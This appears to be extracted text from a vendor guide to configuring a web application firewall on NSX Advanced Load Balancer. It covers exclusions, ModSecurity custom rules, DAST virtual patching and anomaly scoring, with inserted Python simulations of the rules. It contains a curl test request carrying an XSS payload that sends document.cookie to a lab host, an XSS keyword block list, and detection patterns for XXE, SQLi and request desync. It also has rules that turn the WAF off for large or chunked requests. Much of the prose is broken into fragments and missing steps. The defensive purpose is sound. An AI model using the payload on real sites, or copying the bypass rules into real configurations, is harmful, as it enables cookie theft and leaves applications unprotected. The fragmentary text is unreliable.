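```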
3 Best Practices for working with WAF
This section discusses best practices for working with WAF. This chapter includes the following topics:
n Vulnerability Scanner (DAST)
n WAF in Anomaly Score Mode
This section explains Creating Exclusions.
WAF rules monitor and control all requests made to the server in order to identify any malicious content and protect the web application from any potential threat. Although this process establishes a barrier, it may also restrict authorized users from accessing valuable services.
is flagged for a particular IP then, it is most likely a threat that needs to be blocked or removed.
This section discusses Exclusions in WAF.
the regular traffic of an application and the WAF rules configured match. Exclusions create a balance between paranoia and neglecting real threats caused by false positives.
The below are a few reasons for creating exclusions:
1 Applications do not conform to the Default-System-Policy.
transferring HTML content in query parameters.
accessing the application on their direct IP address.
Recommended Assisted Workflow
The steps in mitigating a false positive are as given below:
1 Identify a potential false positive.
2 Eliminate the false positive by adding an Exception to the rule.
will be activated immediately.
This section discusses Creating Exceptions for WAF policies.
To Create Exceptions, follow the below steps:
like the client IP, URI, the type of request, etc.
4 WAF Hits displays all the rules that were matched.
positive remediation.
6 Save the exception, so that it can be applied to the policy.
This can be done at the Pre-CRS, CRS, or Post CRS levels.
Examples for Creating Exclusions
This section discusses the examples for Creating Exclusions.
In the below example, the HTML is added through the parameters.
Request:
POST /foo/bar_form.php HTTP/1.1
Host: boofar.com
name1=value1&name2=value2&img=<img+src='/images/foo.png'>
Match Element: ARGS:img
False Positive Reason: XSS rules match "<img...
Workflow for Mitigation
In order to mitigate, exclude the parameters from being checked for XSS (at the rule group level).
The listed below are a few examples:
1 Admin is aware that the Security Threat level is high.
2 Reason is that many requests are denied.
the offending ARGS:img.
number of denied requests in last day.
6 Admin clicks "Generate Exclude"
parameter"
Importing the CRS files and CRS Update from NSX Advanced Load Balancer Portal
This article shows the steps to download the CRS JSON file from the customer portal and upload it to NSX Advanced Load Balancer. Give the below link
supports curated CRS files that can be downloaded from the customer portal.
Download the CRS File
This section describes how to download the CRS File.
1 Log in to the NSX customer portal with your credentials.
3 Click on the CRS Details icon.
shown below:
5 Choose the CRS file and click on the Download icon.
Advanced Load Balancer.
Upload the CRS File
This section describes how to upload the CRS File.
To upload the CRS file, do the following:
1 Navigate to Templates > WAF > CRS.
2 Click on the Upload button to upload the CRS file.
This article lists out possible use cases for configuring custom rules
custom requirements. Custom security rules are based on the ModSecurity language. For more
information, refer to OWASP ModSecurity Core Rule Set.
to Pre-CRS Rules and Post-CRS Rules.
Custom Rules Examples
This section provides a list of examples for Custom Rules.
You can bypass certain requests from going through WAF. The below are a few ways to bypass WAF:
Via Content Length
To bypass WAF if the content length is greater than the defined value.
Custom Rule Syntax
request skips WAF.
SecRule REQUEST_HEADERS:Content-Length "@gt 1048576" "phase:1,id:4000100,nolog,pass,ctl:ruleEngine=off"
Via Chunked Transfer Encoding
To bypass WAF based on the transfer encoding type.
Custom Rule Syntax
SecRule 'Variable "@match criteria"' ""
SecRule REQUEST_HEADERS:Transfer-Encoding "@contains chunked" "phase:1,id:4000101,nolog,pass,ctl:ruleEngine=off"
Based on Specific Patterns of the Requested Path
To bypass WAF according to certain patterns of the requested path.
Custom Rule Syntax
SecRule REQUEST_URI "@beginsWith /IDMProv/login.do;jsessionid=" "id:4000102,phase:1,t:none,pass,ctl:ruleEngine=off"
To whitelist all requests that match certain conditions.
Custom Rule Syntax
SecRule 'Variable "@match criteria"' "id:4000104,phase:1,t:none,pass,ctl:ruleEngine=off,chain"
SecRule REMOTE_ADDR "@ipMatch 10.0.0.0/8" "t:none"
Since there are two conditions to be fulfilled, a chain rule is used.
SecRule REQUEST_URI "@beginsWith /admin" "id:4000104,phase:1,t:none,pass,ctl:ruleEngine=off,chain"
SecRule REMOTE_ADDR "@ipMatch 10.0.0.0/8" "t:none"
Enabling Customisable XSS keywords
WAF protects against XSS attacks. This rule helps to perform a case-insensitive match of the XSS keywords and blacklist them.
Custom Rule Syntax
SecRule 'variable "@pmfromfile xss-keywords.data"' "msg:'Node-Validator Blacklist Keywords', id:4099802, severity:'CRITICAL', phase:request,
t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:lowercase,t:removeNulls,
rev:'2', ver:'OWASP_CRS/3.0.0', maturity:'1', accuracy:'8', block, ctl:auditLogParts=+E, capture,
tag:'application-multi', tag:'language-multi', tag:'platform-multi', tag:'attack-xss',
tag:'OWASP_CRS/WEB_ATTACK/XSS', tag:'WASCTC/WASC-8', tag:'WASCTC/WASC-22', tag:'OWASP_TOP_10/A3',
tag:'OWASP_AppSensor/IE1', tag:'CAPEC-242',
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',
setvar:'tx.msg=%{rule.msg}', setvar:tx.xss_score=+%{tx.critical_anomaly_score},
setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},
setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}"
"@pmfromfile xss-keywords.data" "msg:'Node-Validator Blacklist Keywords', id:4099802, severity:'CRITICAL', phase:request,
t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:lowercase,t:removeNulls,
rev:'2', ver:'OWASP_CRS/3.0.0', maturity:'1', accuracy:'8', block, ctl:auditLogParts=+E, capture,
tag:'application-multi', tag:'language-multi', tag:'platform-multi', tag:'attack-xss',
tag:'OWASP_CRS/WEB_ATTACK/XSS', tag:'WASCTC/WASC-8', tag:'WASCTC/WASC-22', tag:'OWASP_TOP_10/A3',
tag:'OWASP_AppSensor/IE1', tag:'CAPEC-242',
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',
setvar:'tx.msg=%{rule.msg}', setvar:tx.xss_score=+%{tx.critical_anomaly_score},
setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},
setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}"
Create the data file xss-keywords.data with the following keywords, one per line:
document.cookie
document.write
.parentnode
.innerhtml
window.location
-moz-binding
<![cdata[
file shown below:
curl -v -b cookies -X GET 'http://172.20.0.49/vulnerabilities/xss_r/?name=%3Cscript%3Edocument.location%3D%27http%3A%2F%2F172.20.0.49%2Flogin.php%3F+%27%2520%2Bdocument.cookie%3C%2Fscript%3E#'
empty (not delete) the xss-keywords.data.
Enabling Special Mode for Specific Applications
Some rules will create false positives for certain known applications. To allow the application to
coexist with the CRS, the following rule is used.

Custom Rule Syntax
SecRule <variable> "@unconditionalMatch" "id:4099803,phase:1,pass,setvar:'TX:crs_exclusions_<application>=1'"

In this example, WordPress is added to the CRS exclusion list.
SecRule REMOTE_ADDR "@unconditionalMatch" "id:4099803,phase:1,pass,setvar:'TX:crs_exclusions_wordpress=1'"

Note In addition to this, enable the CRS_903_Application_Specific_Exclusions group, for
example the CRS_903_Wordpress_Exclusion_Rules as shown below:

Allow Other HTTP Methods in WAF
To overwrite the list of HTTP methods allowed in a WAF profile and allow more methods, use the following custom rule.

Custom Rule Syntax
SecRule <variable> "@unconditionalMatch" "id:4099804,phase:1,pass,setvar:'tx.allowed_methods=GET HEAD POST PUT OPTIONS DELETE PATCH'"

"@unconditionalMatch" forces the rule to always return true.
SecRule REMOTE_ADDR "@unconditionalMatch" "id:4099804,phase:1,pass,setvar:'tx.allowed_methods=GET HEAD POST PUT OPTIONS DELETE PATCH'"
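To make the behaviour of the keyword rule 4099802 above concrete, here is an added Python example. It is not part of the guide and not NSX Advanced Load Balancer code: it applies a simplified version of the rule's transformation chain to request arguments and then runs an @pmfromfile-style phrase match with the same keyword list. The transformation subset (urlDecodeUni, htmlEntityDecode, lowercase, removeNulls) is an approximation; utf8toUnicode, jsDecode and cssDecode are left out, and all argument values are constructed test input, including the name value of the curl request shown earlier.

```python
import html
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote

# Constructed copy of the guide's xss-keywords.data: one phrase per line.
XSS_KEYWORDS_DATA = """\
document.cookie
document.write
.parentnode
.innerhtml
window.location
-moz-binding
<![cdata[
"""


def load_keywords(data: str) -> List[str]:
    """Read a @pmfromfile-style data file: one phrase per line, blanks and '#' comments ignored."""
    phrases = []
    for line in data.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            phrases.append(line.lower())
    return phrases


_PERCENT_U = re.compile(r"%u([0-9a-fA-F]{4})")


def url_decode_uni(value: str) -> str:
    """Approximation of t:urlDecodeUni: %XX and %uXXXX escapes decoded once, '+' becomes a space."""
    value = _PERCENT_U.sub(lambda m: chr(int(m.group(1), 16)), value)
    return unquote(value.replace("+", " "))


def transform(value: str) -> str:
    """Subset of the rule's transformation chain, in the rule's order:
    urlDecodeUni, htmlEntityDecode, lowercase, removeNulls
    (utf8toUnicode, jsDecode and cssDecode are omitted in this example)."""
    value = url_decode_uni(value)
    value = html.unescape(value)
    value = value.lower()
    return value.replace("\x00", "")


def pm_match(value: str, phrases: List[str]) -> Optional[str]:
    """@pm / @pmfromfile semantics: a phrase contained anywhere in the value is a match."""
    for phrase in phrases:
        if phrase in value:
            return phrase
    return None


def check_args(args: Dict[str, str], phrases: List[str]) -> List[Tuple[str, str]]:
    """Run the keyword rule over the ARGS collection; each hit is (MATCHED_VAR_NAME, TX.0)."""
    hits = []
    for name, raw in args.items():
        phrase = pm_match(transform(raw), phrases)
        if phrase is not None:
            hits.append((name, phrase))
    return hits


if __name__ == "__main__":
    keywords = load_keywords(XSS_KEYWORDS_DATA)
    # The 'name' value of the guide's curl test request, still URL-encoded as the WAF receives it.
    encoded = ("%3Cscript%3Edocument.location%3D%27http%3A%2F%2F172.20.0.49%2Flogin.php%3F"
               "+%27%2520%2Bdocument.cookie%3C%2Fscript%3E")
    print(check_args({"name": encoded, "page": "1"}, keywords))   # [('name', 'document.cookie')]
```

The decoding order matters: the entity-encoded form &lt;![CDATA[ only becomes a hit because urlDecodeUni runs before htmlEntityDecode and lowercase, which is the same reason the original rule lists its transformations in that order.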
More Examples for Custom Rules
This section provides more examples for custom rules.

- To block all Host header entries not in the list.
SecRule REQUEST_HEADERS:Host "!@pm ct-vs1.local ct-vs2.local" "msg:'Found bad hostname in request',
severity:'CRITICAL', id:4913102, rev:'2', phase:request, block, t:none, t:lowercase, ver:'OWASP_CRS/3.0.0',
maturity:'9', accuracy:'9', capture,
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',
tag:'application-multi', tag:'language-multi', tag:'platform-multi', tag:'attack-reputation-scanner',
tag:'OWASP_CRS/AUTOMATION/SECURITY_SCANNER', tag:'WASCTC/WASC-21', tag:'OWASP_TOP_10/A7', tag:'PCI/6.5.10',
setvar:'tx.msg=%{rule.msg}', setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},
setvar:tx.%{rule.id}-OWASP_CRS/AUTOMATION/SECURITY_SCANNER-%{matched_var_name}=%{matched_var},
setvar:ip.reput_block_flag=1, expirevar:ip.reput_block_flag=%{tx.reput_block_duration},
setvar:'ip.reput_block_reason=%{rule.msg}'"

- To bypass the WAF engine for a specific IP address or subnet.
SecRule REMOTE_ADDR "@ipMatch 10.0.0.0/8" "id:10000,phase:1,nolog,pass,ctl:ruleEngine=Off"

- To check the length of an input parameter.
SecRule ARGS:foo "@ge 24" "id:10001,t:length,phase:2,block,log,auditlog,msg:'Size of foo parameter too big'"

- To check for java.lang.runtime and getruntime for a specific CVE.
SecRule ARGS "@rx java\.lang\.runtime|getruntime" "id:4050100, phase:request, t:none, t:lowercase,
block, msg:'Java Injection found', tag:'application-multi', tag:'language-java', tag:'framework-spring',
tag:'CVE-2018-1273', severity:'CRITICAL'"

- To exclude a specific parameter from a specific rule.
SecRule REQUEST_URI "@contains /vulnerabilities/fi/" "id:4000088,phase:1,t:none,nolog,pass,ctl:ruleRemoveTargetById=930120;ARGS:page"

- To configure a positive rule in ModSecurity.
SecRule ARGS:id "!@rx ^[0-9]+$" "id:12345,phase:2,t:none,block,log,auditlog,msg:'id is not a number'"

- To test for XXE via a custom rule.
SecRule REQBODY_PROCESSOR "@streq xml" "id:4099801,phase:2,t:none,t:trim,t:lowercase,block,chain"
    SecRule REQUEST_BODY "@rx <!ENTITY\s+[^>\s]*\s+SYSTEM"

- To use the detectSQLi operator on the last path element.
SecRule REQUEST_FILENAME "@rx ^/(?:[^/]*/)*(.*)$" \
    "id:4099819,\
    phase:2,\
    block,\
    capture,\
    t:none,t:utf8toUnicode,t:urlDecodeUni,t:removeNulls,\
    msg:'SQL Injection Attack Detected via libinjection',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-multi',\
    tag:'attack-sqli',\
    tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
    tag:'WASCTC/WASC-19',\
    tag:'OWASP_TOP_10/A1',\
    tag:'OWASP_AppSensor/CIE1',\
    tag:'PCI/6.5.2',\
    tag:'paranoia-level/3',\
    ver:'OWASP_CRS/3.1.0',\
    severity:'CRITICAL',\
    chain"
    SecRule TX:1 "@detectSQLi" \
        "setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}',\
        setvar:'tx.msg=%{rule.msg}',\
        setvar:'tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/SQL_INJECTION-%{MATCHED_VAR_NAME}=%{MATCHED_VAR}'"

- To detect an HTTP Desync attack.
SecRule &REQUEST_HEADERS:Content-Length "@gt 0" "id:4099820,phase:1,t:none,block,msg:'HTTP Desync attack detected',chain"
    SecRule REQUEST_HEADERS:Transfer-Encoding "@contains chunked" "t:none,t:lowercase"
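The custom rules in the list above translated into plain checks, as an added Python example (not the guide's code and not how NSX Advanced Load Balancer evaluates rules): the ipMatch bypass, the Host allowlist, the length check, the positive numeric rule, the XXE chain and the Content-Length/Transfer-Encoding desync chain each become a function over a constructed request object, and evaluate() returns the ids of the rules that would fire. The Request class, the sample addresses and the sample XML body are constructed for this example.

```python
import ipaddress
import re
from typing import Dict, List, Optional


class Request:
    """Constructed request object holding only the fields the rules above inspect."""

    def __init__(self, remote_addr: str, headers: Dict[str, str], args: Dict[str, str],
                 body: str = "", body_processor: Optional[str] = None):
        self.remote_addr = remote_addr                                  # REMOTE_ADDR
        self.headers = {k.lower(): v for k, v in headers.items()}       # REQUEST_HEADERS (names are case-insensitive)
        self.args = args                                                # ARGS
        self.body = body                                                # REQUEST_BODY
        self.body_processor = body_processor                            # REQBODY_PROCESSOR, e.g. "XML"


ALLOWED_HOSTS = ["ct-vs1.local", "ct-vs2.local"]        # the @pm list of rule 4913102
BYPASS_NET = ipaddress.ip_network("10.0.0.0/8")          # @ipMatch of rule 10000
XXE_RE = re.compile(r"<!ENTITY\s+[^>\s]*\s+SYSTEM")      # second part of the rule 4099801 chain
NUMERIC_ID_RE = re.compile(r"^[0-9]+$")                  # positive rule 12345


def engine_bypassed(req: Request) -> bool:
    """Rule 10000: ctl:ruleEngine=Off for clients in 10.0.0.0/8."""
    return ipaddress.ip_address(req.remote_addr) in BYPASS_NET


def bad_hostname(req: Request) -> bool:
    """Rule 4913102: Host header after t:lowercase matched with !@pm.
    @pm is a substring match, so a host that merely contains an allowed name passes;
    an exact comparison would be stricter than the rule as written."""
    host = req.headers.get("host", "").lower()
    return not any(allowed in host for allowed in ALLOWED_HOSTS)


def foo_too_long(req: Request) -> bool:
    """Rule 10001: t:length turns ARGS:foo into its length, then @ge 24."""
    return "foo" in req.args and len(req.args["foo"]) >= 24


def id_not_numeric(req: Request) -> bool:
    """Rule 12345: negated regex on ARGS:id; a rule on an absent variable does not fire."""
    return "id" in req.args and NUMERIC_ID_RE.match(req.args["id"]) is None


def xxe_in_xml_body(req: Request) -> bool:
    """Rule 4099801 chain: body processor (t:trim, t:lowercase) is xml AND the body
    declares an external SYSTEM entity."""
    processor = (req.body_processor or "").strip().lower()
    return processor == "xml" and XXE_RE.search(req.body) is not None


def http_desync(req: Request) -> bool:
    """Rule 4099820 chain: a Content-Length header is present (&REQUEST_HEADERS:Content-Length @gt 0)
    AND Transfer-Encoding contains 'chunked' after t:lowercase."""
    return ("content-length" in req.headers
            and "chunked" in req.headers.get("transfer-encoding", "").lower())


# Blocking rules in the order they appear in the guide.
BLOCKING_RULES = [
    (4913102, bad_hostname),
    (10001, foo_too_long),
    (12345, id_not_numeric),
    (4099801, xxe_in_xml_body),
    (4099820, http_desync),
]


def evaluate(req: Request) -> List[int]:
    """Ids of the blocking rules that match; empty when the bypass rule turned the engine off."""
    if engine_bypassed(req):
        return []
    return [rule_id for rule_id, check in BLOCKING_RULES if check(req)]


if __name__ == "__main__":
    # Constructed request carrying both Content-Length and Transfer-Encoding: chunked.
    req = Request("203.0.113.5", {"Host": "ct-vs1.local", "Content-Length": "12",
                                  "Transfer-Encoding": "Chunked"}, {})
    print(evaluate(req))   # [4099820]
```

Two details the functions make visible: the bypass rule runs first and short-circuits everything else, exactly like ctl:ruleEngine=Off in phase 1, and the rules on ARGS:id and ARGS:foo only fire when the argument is present, which is why a positive rule such as 12345 cannot by itself enforce that a parameter exists.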
Vulnerability Scanner (DAST)
A Dynamic Application Security Testing (DAST) scanner is a tool to identify potential security
issues in applications. NSX Advanced Load Balancer can import the scanner results. The imported
results are used to construct a WAF Policy that protects from the security threats found by the
scanner. The technique is often called virtual patching.

NSX Advanced Load Balancer supports the following DAST scanners:
- OWASP ZAP Attack Proxy
- Qualys Web App Scanning

The following are the steps to integrate DAST:
1 Run a scan against a web application not protected by WAF.
2 Import the scan results into WAF Policy rules. Enable WAF.

The avi-iwaf-vpatch.py script converts the scanner results into WAF Policy rules. It creates a
WAF Policy Positive Security group containing all the rules covering the DAST scan issues. The
script automatically creates Positive Security locations for each vulnerable URL reported by the
scanner, and Positive Security rules for each supported issue found. The script generates rules
related to parameter security, for instance URL parameters, HTML form fields and XML or JSON
attributes. The script is located in the DAST directory.
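As an illustration of the virtual patching the script performs, here is an added Python example; it is not the avi-iwaf-vpatch.py script and not code from the guide. A constructed report in the shape of a ZAP XML export is parsed, each reported parameter becomes a positive-security rule tied to its location, and the generated rules are then applied to sample requests. The XML layout, the issue names handled, and the allowed-value pattern assigned to a parameter are assumptions made for this example; the real script's rule content is not shown in the guide.

```python
import re
import xml.etree.ElementTree as ET
from typing import Dict, List
from urllib.parse import urlparse

# Constructed sample in the shape of a ZAP XML export; not real scanner output.
SAMPLE_ZAP_XML = """<?xml version="1.0"?>
<OWASPZAPReport version="2.x">
  <site name="http://app.example.test" host="app.example.test" port="80" ssl="false">
    <alerts>
      <alertitem>
        <alert>SQL Injection</alert>
        <instances>
          <instance><uri>http://app.example.test/products.php</uri><method>GET</method><param>id</param></instance>
        </instances>
      </alertitem>
      <alertitem>
        <alert>Cross Site Scripting (Reflected)</alert>
        <instances>
          <instance><uri>http://app.example.test/search.php</uri><method>GET</method><param>q</param></instance>
        </instances>
      </alertitem>
      <alertitem>
        <alert>X-Frame-Options Header Not Set</alert>
        <instances>
          <instance><uri>http://app.example.test/</uri><method>GET</method><param></param></instance>
        </instances>
      </alertitem>
    </alerts>
  </site>
</OWASPZAPReport>
"""

# Issue types this example turns into parameter rules, and the allowed-value pattern it
# assigns: a conservative character class chosen for the example (assumption).
SUPPORTED_ISSUES = {
    "SQL Injection": r"^[A-Za-z0-9 _.-]{0,64}$",
    "Cross Site Scripting (Reflected)": r"^[A-Za-z0-9 _.-]{0,64}$",
}


def detect_scanner(xml_text: str) -> str:
    """Scanner type from the XML root element; the guide says the script auto-detects it the same way."""
    root = ET.fromstring(xml_text)
    return "zap" if root.tag == "OWASPZAPReport" else "unknown"


def build_positive_rules(xml_text: str) -> List[Dict[str, str]]:
    """One positive-security rule per (location, parameter) the scanner flagged.

    Findings without a parameter (missing headers and the like) are not
    parameter-security issues and are skipped, in line with the guide's limitations note.
    """
    rules = []
    for item in ET.fromstring(xml_text).iter("alertitem"):
        issue = item.findtext("alert", default="")
        pattern = SUPPORTED_ISSUES.get(issue)
        if pattern is None:
            continue
        for inst in item.iter("instance"):
            param = (inst.findtext("param") or "").strip()
            if not param:
                continue
            rules.append({
                "location": urlparse(inst.findtext("uri", default="")).path,   # Positive Security location
                "method": inst.findtext("method", default="GET"),
                "param": param,
                "issue": issue,
                "allowed": pattern,
            })
    return rules


def check_request(rules: List[Dict[str, str]], method: str, path: str,
                  args: Dict[str, str]) -> List[str]:
    """Apply the generated rules to a request; returns the names of parameters that violate them."""
    violations = []
    for rule in rules:
        if rule["location"] == path and rule["method"] == method and rule["param"] in args:
            if re.match(rule["allowed"], args[rule["param"]]) is None:
                violations.append(rule["param"])
    return violations


if __name__ == "__main__":
    rules = build_positive_rules(SAMPLE_ZAP_XML)
    print(detect_scanner(SAMPLE_ZAP_XML), [(r["location"], r["param"]) for r in rules])
    print(check_request(rules, "GET", "/products.php", {"id": "42"}))           # []
    print(check_request(rules, "GET", "/products.php", {"id": "42' OR 1=1"}))   # ['id']
```

The rules are scoped to the location and parameter the scanner actually reported, which is what keeps a virtual patch from turning into a site-wide false-positive source: the same value on a path the scanner never flagged is not checked.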
You can use the following format for python:
avi-iwaf-vpatch.py PARAMETERS FILENAME

The PARAMETERS are as below:
- -c: hostname or IP address of the Avi Controller to connect to
- -u: username to log in to the Avi Controller
- -g: (optional) iWAF Policy PSM group name
- -f: force apply changes

FILENAME is a DAST scan output in XML format.

If --force is set, the system attempts to connect to the NSX Advanced Load Balancer Controller
and write the WAF Policy. If the group name is not specified using -g, the system creates a group
named zap or qualysweb, depending on the scanner being used. The scanner type is auto-detected
based on the XML file format.

python ./avi-iwaf-vpatch.py -c 127.0.0.1 -g zap_group ./zap_results.xml --verbose

Limitations of DAST Scanner Integration
This section explains the limitations of the import script and the manual changes that can be applied.
Many of the reported issues may be beyond the scope of WAF. However, some of them can be mitigated by
appropriate settings in NSX Advanced Load Balancer. Examples are as below:
1 Issues related to clickjacking can be mitigated by adding an X-Frame-Options HTTP header through the
corresponding Header option.
2 Cookie-related issues, such as "Cookie Does Not Contain The 'secure' Attribute", can be resolved by
selecting the appropriate options in the Application Profile/Security settings.

WAF in Anomaly Score Mode
This section explains how anomaly scoring mode works.

By default, the policy flags or rejects a request on the match of a single rule. Alternatively, the
anomaly scoring mode can be used. For more information, refer to WAF Mode and WAF Policy.
In anomaly scoring mode, all the rules that match add up to a request-based score that is compared
with a threshold. If that threshold is reached, the request is blocked.

The default thresholds are set in the CRS setup rule as shown below:
setvar:tx.xss_score_threshold=15,
setvar:tx.rfi_score_threshold=5,
setvar:tx.lfi_score_threshold=5,
setvar:tx.rce_score_threshold=5,
setvar:tx.command_injection_score_threshold=5,
setvar:tx.php_injection_score_threshold=5,
setvar:tx.http_violation_score_threshold=5,
setvar:tx.trojan_score_threshold=5,
setvar:tx.session_fixation_score_threshold=5,
setvar:tx.inbound_anomaly_score_threshold=5,
setvar:tx.outbound_anomaly_score_threshold=4

The most frequently used threshold is inbound_anomaly_score_threshold, which is used to deny in
the default CRS rule 949110 (inbound anomaly score).

Each matching rule adds a score that depends on its severity:
setvar:tx.error_anomaly_score=4,
setvar:tx.warning_anomaly_score=3,
setvar:tx.notice_anomaly_score=2"

A matching rule adds its score to the overall anomaly score and to the score of its attack group,
which has its own specific threshold. For example: 931120, Check for RFI (3/4).

Rule 949110 then compares tx.anomaly_score with the inbound threshold and triggers a deny if it was reached.
SecRule TX:ANOMALY_SCORE "@ge %{tx.inbound_anomaly_score_threshold}"
    "msg:'Inbound Anomaly Score Exceeded (Total Score: %{TX.ANOMALY_SCORE})', severity:CRITICAL, phase:request,
    id:949110, t:none, deny, log, tag:'application-multi',
    tag:'language-multi', tag:'platform-multi', tag:'attack-generic',
    setvar:tx.inbound_anomaly_score=%{tx.anomaly_score}"

A log file entry is created.
To view the log, follow the below steps:
1 Navigate to Applications > Virtual Services.
2 Click on the virtual service mapped to the WAF policy.

Setting Up WAF in Anomaly Scoring Mode
This section discusses setting up WAF in anomaly scoring mode.

Changing the Default Behaviour of WAF Profile
The CRS rules use the block action. Block will trigger the rule engine to execute the default action
mentioned in the WAF profile attached to the policy. This default action contains the deny action that
will then trigger the flag (detection) or reject (enforcement) of the request.
For example: Default Action: phase:1,pass,status:403,log,auditlog.
The default action therefore determines the further WAF handling.

To modify the default action, follow the below steps:
2 Click on the Edit icon against the required policy.
Changing Individual Thresholds and Blocking on Different Threshold Variables (by Group, for Example)
Every threshold or score variable can be changed by using a Pre-CRS custom rule.
SecRule REMOTE_ADDR "@unconditionalMatch" "id:4099803,phase:1,pass,setvar:tx.rfi_score_threshold=2"

For blocking by using different thresholds, a custom Post-CRS rule is required that compares the
group score with its threshold. This rule is a good example for the blocking rule:
SecRule TX:RFI_SCORE "@ge %{tx.rfi_score_threshold}" "msg:'Inbound RFI-Anomaly Score Exceeded (Total Score: %{tx.rfi_score})',
    severity:CRITICAL,phase:request,id:1949110,t:none,
    deny,log,tag:'application-multi',tag:'language-multi',
    tag:'platform-multi',tag:'attack-generic',
    setvar:tx.inbound_tx_msg=%{tx.msg}"

Similar rules can be created for all other groups of attacks.

Note the difference in notation: in the variable part of the rule, the collection and the variable name
are separated by ":" (colon), as in TX:RFI_SCORE, whereas inside a macro expansion they are separated
by "." (dot), as in %{tx.rfi_score_threshold}. If this is not done correctly, the rule will not match
as intended.
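An added Python simulation (example code, not the guide's or the product's) of the anomaly scoring described in WAF in Anomaly Score Mode and in this section: two scoring rules accumulate per-group and total scores over the request arguments, and the evaluation rules 949110 and 1949110 compare them with the thresholds listed in the guide. Rule 4099802 is reduced to a plain keyword check on the decoded value; rule 4000001 is a hypothetical warning-level RFI check constructed only to exercise the group threshold; the critical score of 5 is the CRS default and is assumed because the page lists only the error, warning and notice values. The last call shows the effect of the Pre-CRS override setvar:tx.rfi_score_threshold=2.

```python
import re
from typing import Dict, Optional
from urllib.parse import unquote

# Score per severity. critical=5 is the CRS default and an assumption here; the other three
# values are the ones shown in the guide.
SEVERITY_SCORES = {"CRITICAL": 5, "ERROR": 4, "WARNING": 3, "NOTICE": 2}

# Thresholds exactly as listed in the guide's CRS setup rule.
DEFAULT_THRESHOLDS = {
    "xss_score_threshold": 15,
    "rfi_score_threshold": 5,
    "lfi_score_threshold": 5,
    "rce_score_threshold": 5,
    "command_injection_score_threshold": 5,
    "php_injection_score_threshold": 5,
    "http_violation_score_threshold": 5,
    "trojan_score_threshold": 5,
    "session_fixation_score_threshold": 5,
    "inbound_anomaly_score_threshold": 5,
    "outbound_anomaly_score_threshold": 4,
}

# Keyword list from the guide's xss-keywords.data file.
XSS_KEYWORDS = ["document.cookie", "document.write", ".parentnode", ".innerhtml",
                "window.location", "-moz-binding", "<![cdata["]

# Constructed scoring rules: (rule id, score group, severity, predicate on the decoded value).
# 4099802 mirrors the guide's keyword rule; 4000001 is a hypothetical warning-level RFI check
# (argument value that is an absolute URL), present only to exercise the group threshold.
SCORING_RULES = [
    (4099802, "xss", "CRITICAL", lambda v: any(k in v for k in XSS_KEYWORDS)),
    (4000001, "rfi", "WARNING", lambda v: re.match(r"(?:https?|ftp)://", v) is not None),
]


def score_request(args: Dict[str, str], overrides: Optional[Dict[str, int]] = None) -> dict:
    """Run the scoring rules over all arguments, then the evaluation rules.

    Returns the TX collection as a dict: per-group scores, the total anomaly score,
    the (rule id, argument name) pairs that matched, and the ids of the evaluation
    rules (949110 for the inbound threshold, 1949110 for the RFI group) that denied it.
    `overrides` plays the role of a Pre-CRS rule such as setvar:tx.rfi_score_threshold=2.
    """
    thresholds = dict(DEFAULT_THRESHOLDS)
    thresholds.update(overrides or {})
    tx = {"xss_score": 0, "rfi_score": 0, "anomaly_score": 0, "matched": [], "blocked_by": []}

    # Scoring phase: every matching variable adds the severity score to its group
    # score and to the total; nothing is blocked at this point.
    for rule_id, group, severity, matches in SCORING_RULES:
        for name, raw in args.items():
            if matches(unquote(raw).lower()):   # simplified t:urlDecodeUni,t:lowercase
                tx[group + "_score"] += SEVERITY_SCORES[severity]
                tx["anomaly_score"] += SEVERITY_SCORES[severity]
                tx["matched"].append((rule_id, name))

    # Evaluation phase: 949110 checks the total, 1949110 the RFI group score.
    if tx["anomaly_score"] >= thresholds["inbound_anomaly_score_threshold"]:
        tx["blocked_by"].append(949110)
    if tx["rfi_score"] >= thresholds["rfi_score_threshold"]:
        tx["blocked_by"].append(1949110)
    return tx


if __name__ == "__main__":
    # Constructed requests: the guide's XSS test payload, and an RFI-looking include parameter.
    xss = {"name": "%3Cscript%3Edocument.location%3D%27http%3A%2F%2F172.20.0.49%2Flogin.php%3F"
                   "+%27%2520%2Bdocument.cookie%3C%2Fscript%3E"}
    rfi = {"page": "http://files.example.test/include.txt"}
    print(score_request(xss)["blocked_by"])                               # [949110]
    print(score_request(rfi)["blocked_by"])                               # [] (3 < 5)
    print(score_request(rfi, {"rfi_score_threshold": 2})["blocked_by"])   # [1949110]
```

The second and third calls are the point of the section: a single warning-level RFI match (score 3) stays below both the inbound threshold (5) and the default RFI threshold (5), so nothing blocks; lowering only the RFI threshold with a Pre-CRS rule makes the Post-CRS group rule 1949110 deny it while 949110 still does not fire.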
Sample Test Case
Create any request with the ARGS payload, for example, https://abc-eval-test.net/am-test
4 Analytics and Insights
This chapter discusses the options available on NSX Advanced Load Balancer to monitor the intelligent
web application firewall (WAF). This chapter includes the following topics:
- WAF Log Analytics
WAF Log Analytics
This section discusses the WAF Log Analytics available for a virtual service on NSX Advanced
Load Balancer. To view the log files, follow the steps below:
1 Navigate to Applications > Virtual Services.
2 Click the Virtual Service mapped to the WAF policy and navigate to Logs.
The search filter populates the available options. These filters can be used for WAF Analytics as well.
Analyzing WAF Log Analytics
The following are the fields in a WAF Log Analytics entry:
- Timestamp: Time of capturing the log.
- Client IP: IP address of the client.
